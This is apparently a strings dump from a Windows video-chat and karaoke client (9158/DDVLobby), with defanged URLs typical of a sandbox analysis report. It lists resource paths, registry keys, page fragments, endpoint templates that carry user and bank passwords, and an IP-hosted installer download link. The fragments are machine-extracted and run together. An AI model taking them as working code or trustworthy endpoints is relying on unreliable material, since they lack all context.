LastLoginType
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SOFTWARE\9158web\
allplat.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content:
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
%s%H:%M:%S%s\%s.loghXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%shXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktvhXXp://room.9158.com/ktv_new/free_mic.aspx?userid=hXXp://room.9158.com/ktv_new/song_in.aspx?userid=&r=%ddance_room_new/click_save.aspxhXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%shXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d9158.comtiao58.comSOFTWARE\t58web&userid=%s&intype=2&type=%s&type=%s//skinres//MoneyRestPass.bmp'>
>> #sel1##p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'">#p2#
#p1#
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s%s-%s|HistoryRoom.xmlhXXp://room.9158.com/ktv_new/lately_room.aspx?r=hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next 'href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '')){window.external.OnHistory_Showinfo(4,#pa#);}"\skinres\fav\sel1.gif' style='border:none;'>hXXp://room.9158.com/images/newten/go-home.gif#purl#hXXp://room.9158.com/ktv_new/head1.jpgclass='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"\skinres\fav\sel2.gif' style='border:none;'>iexplore.exehXXp://cugame.9158.com/active/app/load.htmlogin=hXXp://VVV.9158.com/client/login/loginback.aspx?skinres\RankRate.bmpskinres\Hall\SearchRoomTopRight.bmpskinres\Hall\SearchRoomTopLeft.bmpskinres\Unknown.jpgskinres\scroll.bmp\Game\ddvGame.iniSkinRes//none.bmpSkinRes\TreeStatus.bmpSkinRes\Hall\searchRoombtn.bmpSkinRes\Hall\headbutton.bmpSkinRes\Hall\MiniInfor.bmpSkinRes\Hall\bag.bmpSkinRes\systemCenter.bmpSkinRes\set.bmpSkinRes\mybank.bmpSkinRes\vip.bmpSkinRes\systemSet.bmpSkinRes\systemReg.bmp\SkinRes\IMToolBar.bmpHead\era.bmpHead\crown.bmpHead\topestpurple2.bmpHead\topestpurple.bmpHead\DiamondPurple2.bmpHead\DiamondPurple.bmpHead\queenPurple2.bmpHead\queenPurple.bmpHead\Purple2.bmpHead\Purple.bmpHead\purplevip2.bmpHead\purplevip.bmpHead\level15.bmpHead\redvip.bmpHead\0_bluevip.bmpHead\paliesman.bmponclick="window.external.OnclickHead('1')">hXXp://Head\user_photo.bmphXXp://vip.9158.com/Head\H5_2.bmpHead\H5_1.bmpHead\H4_2.bmpHead\H4_1.bmpHead\H3_2.bmpHead\H3_1.bmpHead\H2_2.bmpHead\H2_1.bmpHead\H1_2.bmpHead\H1_1.bmpHead\H0_2.bmpHead\H0_1.bmp-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"%Y%m%d%s\%d\%sSkinRes\BtnMinInfor.bmpSkinRes\BtnCloseInfor.bmp%s&uidx=%sSkinRes\brInfor.bmpSkinRes\blInfor.bmpSkinRes\trInfor.bmpSkinRes\tlInfor.bmp%s %s%d||%d||%d||%s.img50 { width:50px; height:50px; text-align:center; }div.img50 img { max-width:50px; max-height:50px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));%s x%dskinres\message.bmpupdateitem.dllhXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s%s;%sLoginDlgLoginDlg2//banner//logbg.bmpSkinRes\admess.bmp\SkinRes\admess.bmp" width="' target='_blank' onFocus='this.blur()'>\guestlogin.iniSkinRes\TG\mins1.bmp//banner//log_min.bmpSkinRes\TG\closes1.bmp//banner//log_close.bmpHall_LoginMenuLogin_GuestHall_LoginCancelHall_LoginOKHallLoginRegLogin_WeiboLogin_AlipayLogin_QRLogin_QQLogin_idxLogin_UserGuestLogin_TuiGetLoginNodeData.aspxdl.week8.netplatname=%s&userid=%s&loginip=%s&loginport=%d/Error.txtCLoginDlg m_nLoginType!=nTypehXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspxSysMsgCloseBtnskinres\login.gifhXXp://VVV.9158.com/?code=SkinRes/IeClose.png%H : %M %Y/%m/%dnIDKeyMsgCloseBtnSockClient.dllMulti*.dll.PAVCObject@@.PAVCException@@.PAVCFileException@@%sBugReport.exe ,%sFlags:XDS:X ES:X FS:X GS:XSS:ESP:X:X EBP:XCS:EIP:X:XEAX:XEBX:XECX:XEDX:XESI:XEDI:XFault address1: X X:X %sException code1: X %s//build4.5%d-%d-%d %d:%d:%d***************************************************NTDLL.DLLFLT_INVALID_OPERATIONFLT_DENORMAL_OPERAND
>>
X X X:X %s
SkinRes\buttonmi.bmp
SkinRes\roomclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&userid=%s
%s&r=%d
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
//91KboxVCamSetup.exe
//9158VCamSetup.exe
//91KboxVCamSetup.exe
91KboxVCamSetup.exe
//9158VCamSetup.exe
9158VCamSetup.exe
C:\2.txt
%s//in_userchange.aspx?%s
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://cugame.9158.com/active/roomapply/apply.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
.photo { position:relative; width:540px; height:650px; margin:0px auto; }
.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,
.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }
.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }
.photo .img .img_in { display:table; width:480px; height:640px; }
.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }
.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }
* html .photo .img img {
_width: expression(this.offsetWidth > 480 ? '480px': true); }
.photo .prev, .photo .prev:hover,
.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }
.photo .prev { left:10px; }
.photo .prev:hover { }
.photo .next { right:10px; _left:445px; }
.photo .next:hover { }
.photo .down,
.photo .down:hover,
.photo .share_t,
.photo .share_t:hover,
.photo .share_qzone,
.photo .share_qzone:hover,
.photo .share_weibo,
.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }
.photo .down { left:350px; }
.photo .down:hover { }
.photo .share_t { left:120px; }
.photo .share_t:hover { }
.photo .share_qzone { left:180px; }
.photo .share_qzone:hover { }
.photo .share_weibo { left:240px; }
.photo .share_weibo:hover { }
function UrlEncode(s) { var hex=''; var i,j,t; j=0; for (i=0; i 65535) { return ('err!') } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (getletter(third) getletter(fourth)); } function getletter(num) { if (numdocument.getElementById('showimg').src = Astr[nowpos];function downit(){ window.external.downloadpic(Astr[nowpos]);} function linkit(t){ if(t==1) { window.open('hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=&url=hXXp://VVV.9158.com&appkey=ce15e084124446b9a612a5c29f82f080&site=VVV.9158.com&pic=' Astr2[nowpos]); } if(t==2) { window.open('hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' Astr2[nowpos] '&title=&summary=&pics=' Astr2[nowpos]); } if(t==3) { window.open('hXXp://service.weibo.com/share/share.php?title=&url=hXXp://VVV.9158.com&source=bookmark&appkey=2992571369&ralateUid=&pic=' Astr2[nowpos]); } }var arVersion = navigator.appVersion.split('MSIE');if ((version >= 5.5) && (versionvar imgID = (myImage.id) ? "id='" myImage.id "' " : "";var imgClass = (myImage.className) ? "class='" myImage.className "' " : "";var imgTitle = (myImage.title) ? "title='" myImage.title "' " : "title='" myImage.alt "'";var imgStyle = "display:inline-block;" myImage.style.cssText;var strNewHTML = "";myImage.outerHTML = strNewHTML;window.onload=function(){nowpos=%d;imgchange(1);Astr[m_total]='%s'; Astr2[m_total]='%s'; m_total ;SkinRes/GiftBox.bmpSkinRes\getmoney.bmpSkinRes\buttonclose.bmpButton%d%s List of controls follows:%s Number of controls: %lu%s Number of channels: %lu%s Number of source lines associated with destination line: %lu%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")%s Target name: %s%s Target type: %lu --%s Audio line is active. signal is probably passing through the line.%s Audio line is disconnected.%s Audio line is an audio source line associated with a single audio destination line.%s Short Name: %s%s Name: %s%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT%s Audio line is a source originating from an incoming telephone line.%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE%s Audio line is a source originating from the output of an internal synthesizer.%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER%s Audio line is a source originating from personal computer speaker.%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER%s Audio line is a microphone recording source.%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE%s Audio line is a line-level source (for example, line-level input from an external stereo).%s MIXERLINE_COMPONENTTYPE_SRC_LINE%s Audio line is a digital source (for example, digital output from a DAT or audio CD).%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL%s Audio line is a source originating from the output of an internal audio CD.%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC%s Audio line is a source originating from the auxiliary audio line.%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY%s Audio line is an analog source (for example, analog output from a video-cassette tape).%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG%s Audio line is a source that cannot be defined by one of the standard component types.%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED%s Audio line is a destination that will be the final recording source for voice input.%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN%s Audio line is a destination that will be routed to a telephone line.%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS%s Audio line is a destination used for a monitor.%s MIXERLINE_COMPONENTTYPE_DST_MONITOR%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).%s MIXERLINE_COMPONENTTYPE_DST_LINE%s Audio line is a destination that cannot be defined by one of the standard component types.%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL%s Line type :%s -----------------------------------------------------------------------%s Name: %d%s -------------- Item %d -------------%s Number of items per channel: %d%s - Multiple control. The control has two or more possible settings.%s - Control is disabled%s - Uniform control%s Status and support flags:%s - Steps: %lu%s - Max: %lu%s - Min: %lu%s - Max: %ld%s - Min: %ld%s Custom control%s Name: %s%s Short Name: %s%s -----------------------------------------------------------------%s Control type:%s ---------------------------- Control ----------------------------== Source line. Index = %d ===========================================================** Destination line. Index = %d *******************************************************************You will pass these to the Init() functions of the various CMixerBase-derived classesNumber of destination lines: %dName of device: %s..............nVolume:%ddBFS..............%d,%d%Y/%m/%d/%H:%M:%S------UrlAnalyzeEdit---Error---%s\9158.exe%d/%d(SkinRes\X.bmpuseridx=%s&userpass=%s&type=5&sepwd=%s';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');SkinRes\X2.bmphXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
: | %s | ||||||||
: | %s | ||||||||
: | : | %s | : | %s | ';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;'); SkinRes/userlogininfo.png lastlogin: %sid=%s&idx=%s SkinRes\HeadInfo\set.bmp SkinRes\HeadInfo\bind.bmp SkinRes\HeadInfo\close.bmp UserInfoDlg_password2 3t3>SkinRes\ie_bg.pngSkinRes\Notifybutton.bmp'%s&userid=%s&type=%s{47B2178B-6E4A-49B4-9860-9B1836990CA9}{6C9A41B3-ABB2-45F7-B591-93456A6FCD20}{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}%s |